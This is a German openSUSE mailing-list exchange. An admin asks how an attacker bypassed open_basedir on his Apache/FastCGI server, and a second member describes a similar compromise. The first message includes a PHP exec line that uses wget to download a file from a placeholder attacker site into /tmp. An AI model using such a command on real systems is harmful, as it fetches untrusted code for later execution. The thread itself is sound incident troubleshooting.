Am 02.05.2013 19:08, schrieb I.H.:
Hallo,
ich betreibe einen OpenSuSE 12.1 Apache mit FastCGi. Darauf laufen einige Hosts. Ich habe vor ein paar Jahren vom mod_php auf fastcgi umgestellt, wegen div. Sicherheitsprobleme. Lange Zeit war das auch OK. Meine VHosts laufen mit OpenBaseDirRestriction und FastCGI wird so konfiguriert:
exec /usr/bin/php-cgi -d open_basedir=/srv/www/htdocs/user12/:/usr/share/php5/PEAR/ -d session.save_path=/srv/www/htdocs/user12/temp/ -d upload_tmp_dir=/srv/www/htdocs/user12/temp.
Heute Nacht gab es Probleme. Irgend ein Script wurde zum Portscan eines fremden Servers genutzt, dabei wurde ein Script mit dem Namen pshak auf meinen Server ausgeführt. Ich habe das Script im /tmp/ Verzeichniss gefunden. Dort wurde es anscheinend über einen uralten phpMyAdmin hochgeladen. Ich habe mittlerweile auch rausgefunden das man weiterhin per php etwas ins normale /tmp/ kopieren kann.
Obwohl die open_basedir restriction das ja eigentlich nicht erlaubt. Ein Programm wie dieses scheitert auch daran:
Aber mittels wget funktioniert es dann doch:
exec("/usr/bin/wget www.hackerseite-url.org/test.tar -o /tmp/test_download.tar");
test.tar landet tatsächlich im /tmp/ Der Angreifer hat es auch geschafft Dateien die dort sind auszuführen. Wie genau weiss ich noch nicht. Fehlt mir hier ein wichtiger Baustein in meiner Webserver-Konfiguration? Oder muss ich wget und curl irgendwie abschalten?
Oder muss ich den Usern /tmp/ irgendwie verbieten. Hat da wer Erfahrung damit und kann mir weiterhelfen.
Viele Grüße
Ingo Hallo Ingo,
das betrifft Dein Problem jetzt nur sehr am Rande, aber Dein Satz "Der Angreifer hat es auch geschafft Dateien die dort sind auszuführen. Wie genau weiss ich noch nicht. " erinnerte mich spontan an ein Hacker-Problem, das ich vor ca. 6 Monaten hatte: Ich, gerade im Urlaub, sitze im Cafe. Vor mir Laptop und ein Cappucino. Ich lese meine emails und finde ein mail von meinem ISP mit dem Inhalt, dass von meiner IP aus andere Rechner belästigt werden. Und ich möge das bitte sofort abstellen. Etwas panisch bin ich sofort über vpn in meinen Firmen-Server eingestiegen. Ich hatte keine Ahnung wie ich wonach suchen sollte. Also mit "ps" mal die laufenden Prozesse angeschaut. Und das finde gleich mal einen "verdächtigen" Prozess mit eigenartigem Namen der unter der UID von "nobody" lief. Ein "kill" bewirkte nur dass der Prozess sofort wieder mit einer neuen PID da war. Ich habe dann das binary gesucht, umbenannt und nochmal gekill. Dann war Ruhe in der Dose und ich konnte mal etwas beruhigter auf die Suche gehen. Jedenfalls hatte es der Angreifger offenbar geschafft, vermutlich über ftp, eine Datei auf meinen Server hochzuladen, diese dann unter der UID "nobody" zu compilieren und danach auszuführen. Er konnte zwar auf dem Server selbst als "nobody" nichts anrichten, aber er konnte meine Internetverbindung für die Belästigung anderer Rechner misbrauchen. Seither gibt es auf diesem Server die UID "nobody" nicht mehr. Vielleicht hilft's Dir weiter... Grüße, Norbert -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um den Listen Administrator zu erreichen, schicken Sie eine Mail an: opensuse-de+owner@opensuse.org